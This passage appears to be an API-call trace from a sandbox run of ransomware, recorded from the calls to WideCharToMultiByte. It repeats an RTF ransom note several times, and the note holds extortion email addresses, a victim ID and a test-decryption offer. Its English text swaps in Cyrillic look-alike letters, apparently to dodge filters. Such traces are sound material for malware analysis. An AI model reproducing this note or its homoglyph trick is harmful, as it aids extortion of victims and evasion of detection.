f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0068.024] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0068.024] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 